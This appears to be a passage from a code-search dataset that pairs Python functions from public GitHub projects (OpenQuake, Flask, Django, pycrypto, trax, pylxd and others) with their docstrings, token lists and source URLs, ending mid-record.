openquake/hmtk/faults/mfd/anderson_luco_area_mmax.py
python
Type3RecurrenceModel._get_a3_value
(bbar, dbar, slip, beta, mmax)
return (dbar * (dbar - bbar) / (bbar ** 2.)) * (slip / beta) *\ np.exp(-(dbar / 2.) * mmax)
Returns the A3 value defined in III.4 (Table 4)
Returns the A3 value defined in III.4 (Table 4)
[ "Returns", "the", "A3", "value", "defined", "in", "III", ".", "4", "(", "Table", "4", ")" ]
def _get_a3_value(bbar, dbar, slip, beta, mmax): """ Returns the A3 value defined in III.4 (Table 4) """ return (dbar * (dbar - bbar) / (bbar ** 2.)) * (slip / beta) *\ np.exp(-(dbar / 2.) * mmax)
[ "def", "_get_a3_value", "(", "bbar", ",", "dbar", ",", "slip", ",", "beta", ",", "mmax", ")", ":", "return", "(", "dbar", "*", "(", "dbar", "-", "bbar", ")", "/", "(", "bbar", "**", "2.", ")", ")", "*", "(", "slip", "/", "beta", ")", "*", "np...
https://github.com/gem/oq-engine/blob/1bdb88f3914e390abcbd285600bfd39477aae47c/openquake/hmtk/faults/mfd/anderson_luco_area_mmax.py#L178-L183
leancloud/satori
701caccbd4fe45765001ca60435c0cb499477c03
satori-rules/plugin/libs/gevent/corecffi.py
python
loop.fork
(self, ref=True, priority=None)
return fork(self, ref, priority)
[]
def fork(self, ref=True, priority=None): return fork(self, ref, priority)
[ "def", "fork", "(", "self", ",", "ref", "=", "True", ",", "priority", "=", "None", ")", ":", "return", "fork", "(", "self", ",", "ref", ",", "priority", ")" ]
https://github.com/leancloud/satori/blob/701caccbd4fe45765001ca60435c0cb499477c03/satori-rules/plugin/libs/gevent/corecffi.py#L599-L600
niftools/blender_niftools_addon
fc28f567e1fa431ec6633cb2a138898136090b29
io_scene_niftools/operators/kf_export_op.py
python
KfExportOperator.execute
(self, context)
return KfExport(self, context).execute()
Execute the export operators: first constructs a :class:`~io_scene_niftools.nif_export.NifExport` instance and then calls its :meth:`~io_scene_niftools.nif_export.NifExport.execute` method.
Execute the export operators: first constructs a :class:`~io_scene_niftools.nif_export.NifExport` instance and then calls its :meth:`~io_scene_niftools.nif_export.NifExport.execute` method.
[ "Execute", "the", "export", "operators", ":", "first", "constructs", "a", ":", "class", ":", "~io_scene_niftools", ".", "nif_export", ".", "NifExport", "instance", "and", "then", "calls", "its", ":", "meth", ":", "~io_scene_niftools", ".", "nif_export", ".", "...
def execute(self, context): """Execute the export operators: first constructs a :class:`~io_scene_niftools.nif_export.NifExport` instance and then calls its :meth:`~io_scene_niftools.nif_export.NifExport.execute` method. """ return KfExport(self, context).execute()
[ "def", "execute", "(", "self", ",", "context", ")", ":", "return", "KfExport", "(", "self", ",", "context", ")", ".", "execute", "(", ")" ]
https://github.com/niftools/blender_niftools_addon/blob/fc28f567e1fa431ec6633cb2a138898136090b29/io_scene_niftools/operators/kf_export_op.py#L64-L70
jeffh/sniffer
8d4a097fa1b006479d92367a8fcc8c4b71af57f9
sniffer/scanner/base.py
python
PollingScanner._is_new
(self, filepath)
return filepath not in self._watched_files
Returns True if file is not already on the watch list.
Returns True if file is not already on the watch list.
[ "Returns", "True", "if", "file", "is", "not", "already", "on", "the", "watch", "list", "." ]
def _is_new(self, filepath): """Returns True if file is not already on the watch list.""" return filepath not in self._watched_files
[ "def", "_is_new", "(", "self", ",", "filepath", ")", ":", "return", "filepath", "not", "in", "self", ".", "_watched_files" ]
https://github.com/jeffh/sniffer/blob/8d4a097fa1b006479d92367a8fcc8c4b71af57f9/sniffer/scanner/base.py#L256-L258
mtianyan/VueDjangoAntdProBookShop
fd8fa2151c81edde2f8b8e6df8e1ddd799f940c2
third_party/social_core/backends/microsoft.py
python
MicrosoftOAuth2.get_auth_token
(self, user_id)
return access_token
Return the access token for the given user, after ensuring that it has not expired, or refreshing it if so.
Return the access token for the given user, after ensuring that it has not expired, or refreshing it if so.
[ "Return", "the", "access", "token", "for", "the", "given", "user", "after", "ensuring", "that", "it", "has", "not", "expired", "or", "refreshing", "it", "if", "so", "." ]
def get_auth_token(self, user_id): """Return the access token for the given user, after ensuring that it has not expired, or refreshing it if so.""" user = self.get_user(user_id=user_id) access_token = user.social_user.access_token expires_on = user.social_user.extra_data['expires_on'] if expires_on <= int(time.time()): new_token_response = self.refresh_token(token=access_token) access_token = new_token_response['access_token'] return access_token
[ "def", "get_auth_token", "(", "self", ",", "user_id", ")", ":", "user", "=", "self", ".", "get_user", "(", "user_id", "=", "user_id", ")", "access_token", "=", "user", ".", "social_user", ".", "access_token", "expires_on", "=", "user", ".", "social_user", ...
https://github.com/mtianyan/VueDjangoAntdProBookShop/blob/fd8fa2151c81edde2f8b8e6df8e1ddd799f940c2/third_party/social_core/backends/microsoft.py#L69-L78
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_flaskbb/lib/python2.7/site-packages/flask/config.py
python
ConfigAttribute.__init__
(self, name, get_converter=None)
[]
def __init__(self, name, get_converter=None): self.__name__ = name self.get_converter = get_converter
[ "def", "__init__", "(", "self", ",", "name", ",", "get_converter", "=", "None", ")", ":", "self", ".", "__name__", "=", "name", "self", ".", "get_converter", "=", "get_converter" ]
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/lib/python2.7/site-packages/flask/config.py#L24-L26
conjure-up/conjure-up
d2bf8ab8e71ff01321d0e691a8d3e3833a047678
conjureup/juju.py
python
get_credential
(cloud, cred_name=None)
Get credential Arguments: cloud: cloud applicable to user credentials cred_name: name of credential to get, or default
Get credential
[ "Get", "credential" ]
def get_credential(cloud, cred_name=None): """ Get credential Arguments: cloud: cloud applicable to user credentials cred_name: name of credential to get, or default """ creds = get_credentials() if cloud not in creds.keys(): return None cred = creds[cloud] default_credential = cred.pop('default-credential', None) cred.pop('default-region', None) if cred_name is not None and cred_name in cred.keys(): return cred[cred_name] elif default_credential is not None and default_credential in cred.keys(): return cred[default_credential] elif len(cred) == 1: return list(cred.values())[0] else: return None
[ "def", "get_credential", "(", "cloud", ",", "cred_name", "=", "None", ")", ":", "creds", "=", "get_credentials", "(", ")", "if", "cloud", "not", "in", "creds", ".", "keys", "(", ")", ":", "return", "None", "cred", "=", "creds", "[", "cloud", "]", "de...
https://github.com/conjure-up/conjure-up/blob/d2bf8ab8e71ff01321d0e691a8d3e3833a047678/conjureup/juju.py#L329-L352
ialbert/biostar-central
2dc7bd30691a50b2da9c2833ba354056bc686afa
biostar/forum/signals.py
python
check_spam
(sender, instance, created, **kwargs)
[]
def check_spam(sender, instance, created, **kwargs): # Classify post as spam/ham. tasks.spam_check.spool(uid=instance.uid)
[ "def", "check_spam", "(", "sender", ",", "instance", ",", "created", ",", "*", "*", "kwargs", ")", ":", "# Classify post as spam/ham.", "tasks", ".", "spam_check", ".", "spool", "(", "uid", "=", "instance", ".", "uid", ")" ]
https://github.com/ialbert/biostar-central/blob/2dc7bd30691a50b2da9c2833ba354056bc686afa/biostar/forum/signals.py#L170-L172
ethereon/caffe-tensorflow
d870c51e8fa3452cb210b378c78be7ba4dcc8cf0
kaffe/graph.py
python
GraphBuilder.__init__
(self, def_path, phase='test')
def_path: Path to the model definition (.prototxt) data_path: Path to the model data (.caffemodel) phase: Either 'test' or 'train'. Used for filtering phase-specific nodes.
def_path: Path to the model definition (.prototxt) data_path: Path to the model data (.caffemodel) phase: Either 'test' or 'train'. Used for filtering phase-specific nodes.
[ "def_path", ":", "Path", "to", "the", "model", "definition", "(", ".", "prototxt", ")", "data_path", ":", "Path", "to", "the", "model", "data", "(", ".", "caffemodel", ")", "phase", ":", "Either", "test", "or", "train", ".", "Used", "for", "filtering", ...
def __init__(self, def_path, phase='test'): ''' def_path: Path to the model definition (.prototxt) data_path: Path to the model data (.caffemodel) phase: Either 'test' or 'train'. Used for filtering phase-specific nodes. ''' self.def_path = def_path self.phase = phase self.load()
[ "def", "__init__", "(", "self", ",", "def_path", ",", "phase", "=", "'test'", ")", ":", "self", ".", "def_path", "=", "def_path", "self", ".", "phase", "=", "phase", "self", ".", "load", "(", ")" ]
https://github.com/ethereon/caffe-tensorflow/blob/d870c51e8fa3452cb210b378c78be7ba4dcc8cf0/kaffe/graph.py#L132-L140
larryhastings/gilectomy
4315ec3f1d6d4f813cc82ce27a24e7f784dbfc1a
Lib/ipaddress.py
python
IPv6Address.sixtofour
(self)
return IPv4Address((self._ip >> 80) & 0xFFFFFFFF)
Return the IPv4 6to4 embedded address. Returns: The IPv4 6to4-embedded address if present or None if the address doesn't appear to contain a 6to4 embedded address.
Return the IPv4 6to4 embedded address.
[ "Return", "the", "IPv4", "6to4", "embedded", "address", "." ]
def sixtofour(self): """Return the IPv4 6to4 embedded address. Returns: The IPv4 6to4-embedded address if present or None if the address doesn't appear to contain a 6to4 embedded address. """ if (self._ip >> 112) != 0x2002: return None return IPv4Address((self._ip >> 80) & 0xFFFFFFFF)
[ "def", "sixtofour", "(", "self", ")", ":", "if", "(", "self", ".", "_ip", ">>", "112", ")", "!=", "0x2002", ":", "return", "None", "return", "IPv4Address", "(", "(", "self", ".", "_ip", ">>", "80", ")", "&", "0xFFFFFFFF", ")" ]
https://github.com/larryhastings/gilectomy/blob/4315ec3f1d6d4f813cc82ce27a24e7f784dbfc1a/Lib/ipaddress.py#L2036-L2046
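The `sixtofour` accessor in this record also ships in the CPython standard library's `ipaddress` module, so its behaviour can be checked directly: a 6to4 address carries the `2002::/16` prefix with the embedded IPv4 address in the next 32 bits, and anything else yields `None`.

```python
import ipaddress

# 2002:c000:0204::/48 embeds the IPv4 address 0xc0000204 == 192.0.2.4
addr = ipaddress.IPv6Address('2002:c000:204::1')
print(addr.sixtofour)  # the embedded IPv4Address

# A non-6to4 address (prefix != 0x2002) returns None.
print(ipaddress.IPv6Address('2001:db8::1').sixtofour)
```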
giantbranch/python-hacker-code
addbc8c73e7e6fb9e4fcadcec022fa1d3da4b96d
我手敲的代码(中文注释)/chapter9/pycrypto-2.6.1/build/lib.win32-2.7/Crypto/PublicKey/RSA.py
python
RSAImplementation.construct
(self, tup)
return _RSAobj(self, key)
Construct an RSA key from a tuple of valid RSA components. The modulus **n** must be the product of two primes. The public exponent **e** must be odd and larger than 1. In case of a private key, the following equations must apply: - e != 1 - p*q = n - e*d = 1 mod (p-1)(q-1) - p*u = 1 mod q :Parameters: tup : tuple A tuple of long integers, with at least 2 and no more than 6 items. The items come in the following order: 1. RSA modulus (n). 2. Public exponent (e). 3. Private exponent (d). Only required if the key is private. 4. First factor of n (p). Optional. 5. Second factor of n (q). Optional. 6. CRT coefficient, (1/p) mod q (u). Optional. :Return: An RSA key object (`_RSAobj`).
Construct an RSA key from a tuple of valid RSA components.
[ "Construct", "an", "RSA", "key", "from", "a", "tuple", "of", "valid", "RSA", "components", "." ]
def construct(self, tup): """Construct an RSA key from a tuple of valid RSA components. The modulus **n** must be the product of two primes. The public exponent **e** must be odd and larger than 1. In case of a private key, the following equations must apply: - e != 1 - p*q = n - e*d = 1 mod (p-1)(q-1) - p*u = 1 mod q :Parameters: tup : tuple A tuple of long integers, with at least 2 and no more than 6 items. The items come in the following order: 1. RSA modulus (n). 2. Public exponent (e). 3. Private exponent (d). Only required if the key is private. 4. First factor of n (p). Optional. 5. Second factor of n (q). Optional. 6. CRT coefficient, (1/p) mod q (u). Optional. :Return: An RSA key object (`_RSAobj`). """ key = self._math.rsa_construct(*tup) return _RSAobj(self, key)
[ "def", "construct", "(", "self", ",", "tup", ")", ":", "key", "=", "self", ".", "_math", ".", "rsa_construct", "(", "*", "tup", ")", "return", "_RSAobj", "(", "self", ",", "key", ")" ]
https://github.com/giantbranch/python-hacker-code/blob/addbc8c73e7e6fb9e4fcadcec022fa1d3da4b96d/我手敲的代码(中文注释)/chapter9/pycrypto-2.6.1/build/lib.win32-2.7/Crypto/PublicKey/RSA.py#L512-L540
kanzure/nanoengineer
874e4c9f8a9190f093625b267f9767e19f82e6c4
cad/src/operations/ops_motion.py
python
ops_motion_Mixin.Invert
(self)
Invert the atoms of the selected chunk(s) around the chunk centers
Invert the atoms of the selected chunk(s) around the chunk centers
[ "Invert", "the", "atoms", "of", "the", "selected", "chunk", "(", "s", ")", "around", "the", "chunk", "centers" ]
def Invert(self): """ Invert the atoms of the selected chunk(s) around the chunk centers """ mc = env.begin_op("Invert") cmd = greenmsg("Invert: ") if not self.selmols: msg = redmsg("No selected chunks to invert") env.history.message(cmd + msg) return self.changed() for m in self.selmols: m.stretch(-1.0) self.o.gl_update() info = fix_plurals( "Inverted %d chunk(s)" % len(self.selmols)) env.history.message( cmd + info) env.end_op(mc)
[ "def", "Invert", "(", "self", ")", ":", "mc", "=", "env", ".", "begin_op", "(", "\"Invert\"", ")", "cmd", "=", "greenmsg", "(", "\"Invert: \"", ")", "if", "not", "self", ".", "selmols", ":", "msg", "=", "redmsg", "(", "\"No selected chunks to invert\"", ...
https://github.com/kanzure/nanoengineer/blob/874e4c9f8a9190f093625b267f9767e19f82e6c4/cad/src/operations/ops_motion.py#L122-L140
marinho/geraldo
868ebdce67176d9b6205cddc92476f642c783fff
site/newsite/site-geraldo/django/contrib/auth/backends.py
python
ModelBackend.has_module_perms
(self, user_obj, app_label)
return False
Returns True if user_obj has any permissions in the given app_label.
Returns True if user_obj has any permissions in the given app_label.
[ "Returns", "True", "if", "user_obj", "has", "any", "permissions", "in", "the", "given", "app_label", "." ]
def has_module_perms(self, user_obj, app_label): """ Returns True if user_obj has any permissions in the given app_label. """ for perm in self.get_all_permissions(user_obj): if perm[:perm.index('.')] == app_label: return True return False
[ "def", "has_module_perms", "(", "self", ",", "user_obj", ",", "app_label", ")", ":", "for", "perm", "in", "self", ".", "get_all_permissions", "(", "user_obj", ")", ":", "if", "perm", "[", ":", "perm", ".", "index", "(", "'.'", ")", "]", "==", "app_labe...
https://github.com/marinho/geraldo/blob/868ebdce67176d9b6205cddc92476f642c783fff/site/newsite/site-geraldo/django/contrib/auth/backends.py#L67-L74
tokenika/eosfactory
ee00f662872690738a702fc05aca1f1c0c8d4783
eosfactory/core/setup.py
python
set_nodeos_address
(address, prefix=None)
Set testnet properties. :param str address: testnet url, for example `http://faucet.cryptokylin.io`. :param str prefix: A prefix prepended to names of system files like the wallet file and password map file and account map file, in order to relate them to the given testnet.
Set testnet properties.
[ "Set", "testnet", "properties", "." ]
def set_nodeos_address(address, prefix=None): '''Set testnet properties. :param str address: testnet url, for example `http://faucet.cryptokylin.io`. :param str prefix: A prefix prepended to names of system files like the wallet file and password map file and account map file, in order to relate them to the given testnet. ''' global __nodeos_address if address: __nodeos_address = address if not __nodeos_address: print(''' ERROR in setup.set_nodeos_address(...)! nodeos address is not set. ''') return address = __nodeos_address p = url_prefix(address) if prefix: p = prefix + "_" + p global __file_prefix __file_prefix = p global account_map account_map = __file_prefix + "accounts.json" global password_map password_map = __file_prefix + "passwords.json" global wallet_default_name wallet_default_name = __file_prefix + "default"
[ "def", "set_nodeos_address", "(", "address", ",", "prefix", "=", "None", ")", ":", "global", "__nodeos_address", "if", "address", ":", "__nodeos_address", "=", "address", "if", "not", "__nodeos_address", ":", "print", "(", "'''\nERROR in setup.set_nodeos_address(...)!...
https://github.com/tokenika/eosfactory/blob/ee00f662872690738a702fc05aca1f1c0c8d4783/eosfactory/core/setup.py#L44-L77
biolab/orange3
41685e1c7b1d1babe680113685a2d44bcc9fec0b
Orange/widgets/model/owlogisticregression.py
python
OWLogisticRegression.update_model
(self)
[]
def update_model(self): super().update_model() coef_table = None if self.model is not None: coef_table = create_coef_table(self.model) self.Outputs.coefficients.send(coef_table)
[ "def", "update_model", "(", "self", ")", ":", "super", "(", ")", ".", "update_model", "(", ")", "coef_table", "=", "None", "if", "self", ".", "model", "is", "not", "None", ":", "coef_table", "=", "create_coef_table", "(", "self", ".", "model", ")", "se...
https://github.com/biolab/orange3/blob/41685e1c7b1d1babe680113685a2d44bcc9fec0b/Orange/widgets/model/owlogisticregression.py#L109-L114
Nuitka/Nuitka
39262276993757fa4e299f497654065600453fc9
nuitka/build/inline_copy/lib/scons-4.3.0/SCons/Node/FS.py
python
RootDir._morph
(self)
Turn a file system Node (either a freshly initialized directory object or a separate Entry object) into a proper directory object. Set up this directory's entries and hook it into the file system tree. Specify that directories (this Node) don't use signatures for calculating whether they're current.
Turn a file system Node (either a freshly initialized directory object or a separate Entry object) into a proper directory object.
[ "Turn", "a", "file", "system", "Node", "(", "either", "a", "freshly", "initialized", "directory", "object", "or", "a", "separate", "Entry", "object", ")", "into", "a", "proper", "directory", "object", "." ]
def _morph(self): """Turn a file system Node (either a freshly initialized directory object or a separate Entry object) into a proper directory object. Set up this directory's entries and hook it into the file system tree. Specify that directories (this Node) don't use signatures for calculating whether they're current. """ self.repositories = [] self.srcdir = None self.entries = {'.': self, '..': self.dir} self.cwd = self self.searched = 0 self._sconsign = None self.variant_dirs = [] self.changed_since_last_build = 3 self._func_sconsign = 1 self._func_exists = 2 self._func_get_contents = 2 # Don't just reset the executor, replace its action list, # because it might have some pre-or post-actions that need to # be preserved. # # But don't reset the executor if there is a non-null executor # attached already. The existing executor might have other # targets, in which case replacing the action list with a # Mkdir action is a big mistake. if not hasattr(self, 'executor'): self.builder = get_MkdirBuilder() self.get_executor().set_action_list(self.builder.action) else: # Prepend MkdirBuilder action to existing action list l = self.get_executor().action_list a = get_MkdirBuilder().action l.insert(0, a) self.get_executor().set_action_list(l)
[ "def", "_morph", "(", "self", ")", ":", "self", ".", "repositories", "=", "[", "]", "self", ".", "srcdir", "=", "None", "self", ".", "entries", "=", "{", "'.'", ":", "self", ",", "'..'", ":", "self", ".", "dir", "}", "self", ".", "cwd", "=", "s...
https://github.com/Nuitka/Nuitka/blob/39262276993757fa4e299f497654065600453fc9/nuitka/build/inline_copy/lib/scons-4.3.0/SCons/Node/FS.py#L2362-L2400
cgre-aachen/gempy
6ad16c46fc6616c9f452fba85d31ce32decd8b10
gempy/bayesian/fields.py
python
fuzziness
(probabilities: np.ndarray)
return fuzz
Return the fuzziness of the probability array Eq 3. from doi.org/10.1016/j.tecto.2011.05.001 :param probabilities: probabilities array :return: float of fuzziness
Return the fuzziness of the probability array
[ "Return", "the", "fuzziness", "of", "the", "probability", "array" ]
def fuzziness(probabilities: np.ndarray) -> float: """ Return the fuzziness of the probability array Eq 3. from doi.org/10.1016/j.tecto.2011.05.001 :param probabilities: probabilities array :return: float of fuzziness """ p = probabilities fuzz = -np.mean(np.nan_to_num(p * np.log(p) + (1 - p) * np.log(1 - p))) return fuzz
[ "def", "fuzziness", "(", "probabilities", ":", "np", ".", "ndarray", ")", "->", "float", ":", "p", "=", "probabilities", "fuzz", "=", "-", "np", ".", "mean", "(", "np", ".", "nan_to_num", "(", "p", "*", "np", ".", "log", "(", "p", ")", "+", "(", ...
https://github.com/cgre-aachen/gempy/blob/6ad16c46fc6616c9f452fba85d31ce32decd8b10/gempy/bayesian/fields.py#L44-L54
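The `fuzziness` record above depends only on numpy, so the two extremes of the measure are easy to verify on a hypothetical probability array: mean binary entropy peaks at ln 2 for p = 0.5 and vanishes for fully crisp probabilities (0 or 1), where `nan_to_num` guards the 0·log 0 limit.

```python
import numpy as np

def fuzziness(probabilities: np.ndarray) -> float:
    # Eq. 3 from doi.org/10.1016/j.tecto.2011.05.001: negative mean
    # binary entropy; nan_to_num maps the 0 * log(0) NaNs to zero.
    p = probabilities
    return -np.mean(np.nan_to_num(p * np.log(p) + (1 - p) * np.log(1 - p)))

with np.errstate(divide='ignore', invalid='ignore'):
    print(fuzziness(np.array([0.5, 0.5])))  # ln(2), maximal fuzziness
    print(fuzziness(np.array([0.0, 1.0])))  # zero, fully crisp
```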
hclhkbu/dlbench
978b034e9c34e6aaa38782bb1e4a2cea0c01d0f9
synthetic/experiments/tensorflow/fc/tf_upgrade.py
python
TensorFlowCodeUpgrader.process_tree
(self, root_directory, output_root_directory)
return file_count, report, tree_errors
Processes upgrades on an entire tree of python files in place. Note that this handles only Python files; if you have custom code in other languages, you will need to upgrade it manually. Args: root_directory: Directory to walk and process. output_root_directory: Directory to use as base Returns: A tuple of files processed, the report string for all files, and errors
Processes upgrades on an entire tree of python files in place.
[ "Processes", "upgrades", "on", "an", "entire", "tree", "of", "python", "files", "in", "place", "." ]
def process_tree(self, root_directory, output_root_directory): """Processes upgrades on an entire tree of python files in place. Note that only Python files. If you have custom code in other languages, you will need to manually upgrade those. Args: root_directory: Directory to walk and process. output_root_directory: Directory to use as base Returns: A tuple of files processed, the report string ofr all files, and errors """ # make sure output directory doesn't exist if output_root_directory and os.path.exists(output_root_directory): print("Output directory %r must not already exist." % ( output_root_directory)) sys.exit(1) # make sure output directory does not overlap with root_directory norm_root = os.path.split(os.path.normpath(root_directory)) norm_output = os.path.split(os.path.normpath(output_root_directory)) if norm_root == norm_output: print("Output directory %r same as input directory %r" % ( root_directory, output_root_directory)) sys.exit(1) # Collect list of files to process (we do this to correctly handle if the # user puts the output directory in some sub directory of the input dir) files_to_process = [] for dir_name, _, file_list in os.walk(root_directory): py_files = [f for f in file_list if f.endswith(".py")] for filename in py_files: fullpath = os.path.join(dir_name, filename) fullpath_output = os.path.join( output_root_directory, os.path.relpath(fullpath, root_directory)) files_to_process.append((fullpath, fullpath_output)) file_count = 0 tree_errors = [] report = "" report += ("=" * 80) + "\n" report += "Input tree: %r\n" % root_directory report += ("=" * 80) + "\n" for input_path, output_path in files_to_process: output_directory = os.path.dirname(output_path) if not os.path.isdir(output_directory): os.makedirs(output_directory) file_count += 1 _, l_report, l_errors = self.process_file(input_path, output_path) tree_errors += l_errors report += l_report return file_count, report, tree_errors
[ "def", "process_tree", "(", "self", ",", "root_directory", ",", "output_root_directory", ")", ":", "# make sure output directory doesn't exist", "if", "output_root_directory", "and", "os", ".", "path", ".", "exists", "(", "output_root_directory", ")", ":", "print", "(...
https://github.com/hclhkbu/dlbench/blob/978b034e9c34e6aaa38782bb1e4a2cea0c01d0f9/synthetic/experiments/tensorflow/fc/tf_upgrade.py#L567-L620
selfteaching/selfteaching-python-camp
9982ee964b984595e7d664b07c389cddaf158f1e
19100205/Ceasar1978/pip-19.0.3/src/pip/_vendor/distlib/resources.py
python
ResourceCache.get
(self, resource)
return result
Get a resource into the cache. :param resource: A :class:`Resource` instance. :return: The pathname of the resource in the cache.
Get a resource into the cache,
[ "Get", "a", "resource", "into", "the", "cache" ]
def get(self, resource): """ Get a resource into the cache, :param resource: A :class:`Resource` instance. :return: The pathname of the resource in the cache. """ prefix, path = resource.finder.get_cache_info(resource) if prefix is None: result = path else: result = os.path.join(self.base, self.prefix_to_dir(prefix), path) dirname = os.path.dirname(result) if not os.path.isdir(dirname): os.makedirs(dirname) if not os.path.exists(result): stale = True else: stale = self.is_stale(resource, path) if stale: # write the bytes of the resource to the cache location with open(result, 'wb') as f: f.write(resource.bytes) return result
[ "def", "get", "(", "self", ",", "resource", ")", ":", "prefix", ",", "path", "=", "resource", ".", "finder", ".", "get_cache_info", "(", "resource", ")", "if", "prefix", "is", "None", ":", "result", "=", "path", "else", ":", "result", "=", "os", ".",...
https://github.com/selfteaching/selfteaching-python-camp/blob/9982ee964b984595e7d664b07c389cddaf158f1e/19100205/Ceasar1978/pip-19.0.3/src/pip/_vendor/distlib/resources.py#L46-L69
FSecureLABS/Jandroid
e31d0dab58a2bfd6ed8e0a387172b8bd7c893436
libs/platform-tools/platform-tools_linux/systrace/catapult/devil/devil/android/forwarder.py
python
Forwarder.DevicePortForHostPort
(host_port)
Returns the device port that corresponds to a given host port.
Returns the device port that corresponds to a given host port.
[ "Returns", "the", "device", "port", "that", "corresponds", "to", "a", "given", "host", "port", "." ]
def DevicePortForHostPort(host_port): """Returns the device port that corresponds to a given host port.""" with _FileLock(Forwarder._LOCK_PATH): serial_and_port = Forwarder._GetInstanceLocked( None)._host_to_device_port_map.get(host_port) return serial_and_port[1] if serial_and_port else None
[ "def", "DevicePortForHostPort", "(", "host_port", ")", ":", "with", "_FileLock", "(", "Forwarder", ".", "_LOCK_PATH", ")", ":", "serial_and_port", "=", "Forwarder", ".", "_GetInstanceLocked", "(", "None", ")", ".", "_host_to_device_port_map", ".", "get", "(", "h...
https://github.com/FSecureLABS/Jandroid/blob/e31d0dab58a2bfd6ed8e0a387172b8bd7c893436/libs/platform-tools/platform-tools_linux/systrace/catapult/devil/devil/android/forwarder.py#L248-L253
theislab/anndata
664e32b0aa6625fe593370d37174384c05abfd4e
anndata/_core/views.py
python
_ViewMixin.__init__
( self, *args, view_args: Tuple["anndata.AnnData", str, Tuple[str, ...]] = None, **kwargs, )
[]
def __init__( self, *args, view_args: Tuple["anndata.AnnData", str, Tuple[str, ...]] = None, **kwargs, ): if view_args is not None: view_args = ElementRef(*view_args) self._view_args = view_args super().__init__(*args, **kwargs)
[ "def", "__init__", "(", "self", ",", "*", "args", ",", "view_args", ":", "Tuple", "[", "\"anndata.AnnData\"", ",", "str", ",", "Tuple", "[", "str", ",", "...", "]", "]", "=", "None", ",", "*", "*", "kwargs", ",", ")", ":", "if", "view_args", "is", ...
https://github.com/theislab/anndata/blob/664e32b0aa6625fe593370d37174384c05abfd4e/anndata/_core/views.py#L48-L57
ethereum/py-evm
026ee20f8d9b70d7c1b6a4fb9484d5489d425e54
eth/abc.py
python
TransactionContextAPI.gas_price
(self)
Return the gas price of the transaction context.
Return the gas price of the transaction context.
[ "Return", "the", "gas", "price", "of", "the", "transaction", "context", "." ]
def gas_price(self) -> int: """ Return the gas price of the transaction context. """ ...
[ "def", "gas_price", "(", "self", ")", "->", "int", ":", "..." ]
https://github.com/ethereum/py-evm/blob/026ee20f8d9b70d7c1b6a4fb9484d5489d425e54/eth/abc.py#L1413-L1417
allegroai/clearml
5953dc6eefadcdfcc2bdbb6a0da32be58823a5af
clearml/debugging/timer.py
python
Timer.reset_average
(self)
Reset average counters (does not change current timer)
Reset average counters (does not change current timer)
[ "Reset", "average", "counters", "(", "does", "not", "change", "current", "timer", ")" ]
def reset_average(self): """ Reset average counters (does not change current timer) """ self._total_time = 0 self._average_time = 0 self._calls = 0
[ "def", "reset_average", "(", "self", ")", ":", "self", ".", "_total_time", "=", "0", "self", ".", "_average_time", "=", "0", "self", ".", "_calls", "=", "0" ]
https://github.com/allegroai/clearml/blob/5953dc6eefadcdfcc2bdbb6a0da32be58823a5af/clearml/debugging/timer.py#L24-L28
google/trax
d6cae2067dedd0490b78d831033607357e975015
trax/rl/actor_critic.py
python
SamplingAWR.policy_loss
(self, **unused_kwargs)
return tl.Serial( tl.Fn('LossInput', LossInput, n_out=4), # Policy loss is expected to consume # (log_probs, advantages, old_log_probs, mask). SamplingAWRLoss( beta=self._beta, w_max=self._w_max, thresholds=self._thresholds, reweight=self._reweight, sampled_all_discrete=self._sample_all_discrete_actions) )
Policy loss.
Policy loss.
[ "Policy", "loss", "." ]
def policy_loss(self, **unused_kwargs): """Policy loss.""" def LossInput(dist_inputs, actions, q_values, act_log_probs, mask): # pylint: disable=invalid-name """Calculates action log probabilities and normalizes advantages.""" # (batch_size, n_samples, ...) -> (n_samples, batch_size, ...) q_values = jnp.swapaxes(q_values, 0, 1) mask = jnp.swapaxes(mask, 0, 1) actions = jnp.swapaxes(actions, 0, 1) act_log_probs = jnp.swapaxes(act_log_probs, 0, 1) # TODO(pkozakowski,lukaszkaiser): Try max here, or reweighting? if self._sample_all_discrete_actions: values = jnp.sum(q_values * jnp.exp(act_log_probs), axis=0) else: values = jnp.mean(q_values, axis=0) advantages = q_values - values # Broadcasting values over n_samples advantages = self._preprocess_advantages(advantages) # Broadcast inputs and calculate log-probs dist_inputs = jnp.broadcast_to( dist_inputs, (self._q_value_n_samples,) + dist_inputs.shape) log_probs = self._policy_dist.log_prob(dist_inputs, actions) return (log_probs, advantages, act_log_probs, mask) return tl.Serial( tl.Fn('LossInput', LossInput, n_out=4), # Policy loss is expected to consume # (log_probs, advantages, old_log_probs, mask). SamplingAWRLoss( beta=self._beta, w_max=self._w_max, thresholds=self._thresholds, reweight=self._reweight, sampled_all_discrete=self._sample_all_discrete_actions) )
[ "def", "policy_loss", "(", "self", ",", "*", "*", "unused_kwargs", ")", ":", "def", "LossInput", "(", "dist_inputs", ",", "actions", ",", "q_values", ",", "act_log_probs", ",", "mask", ")", ":", "# pylint: disable=invalid-name", "\"\"\"Calculates action log probabil...
https://github.com/google/trax/blob/d6cae2067dedd0490b78d831033607357e975015/trax/rl/actor_critic.py#L1148-L1180
MegEngine/Models
4c55d28bad03652a4e352bf5e736a75df041d84a
official/vision/detection/models/freeanchor.py
python
FreeAnchor.preprocess_image
(self, image)
return normed_image
[]
def preprocess_image(self, image): padded_image = layers.get_padded_tensor(image, 32, 0.0) normed_image = ( padded_image - np.array(self.cfg.img_mean, dtype="float32")[None, :, None, None] ) / np.array(self.cfg.img_std, dtype="float32")[None, :, None, None] return normed_image
[ "def", "preprocess_image", "(", "self", ",", "image", ")", ":", "padded_image", "=", "layers", ".", "get_padded_tensor", "(", "image", ",", "32", ",", "0.0", ")", "normed_image", "=", "(", "padded_image", "-", "np", ".", "array", "(", "self", ".", "cfg",...
https://github.com/MegEngine/Models/blob/4c55d28bad03652a4e352bf5e736a75df041d84a/official/vision/detection/models/freeanchor.py#L62-L68
lxc/pylxd
d82e4bbf81cb2a932d62179e895c955c489066fd
pylxd/models/instance.py
python
Instance.rename
(self, name, wait=False)
Rename an instance.
Rename an instance.
[ "Rename", "an", "instance", "." ]
def rename(self, name, wait=False): """Rename an instance.""" response = self.api.post(json={"name": name}) if wait: self.client.operations.wait_for_operation(response.json()["operation"]) self.name = name
[ "def", "rename", "(", "self", ",", "name", ",", "wait", "=", "False", ")", ":", "response", "=", "self", ".", "api", ".", "post", "(", "json", "=", "{", "\"name\"", ":", "name", "}", ")", "if", "wait", ":", "self", ".", "client", ".", "operations...
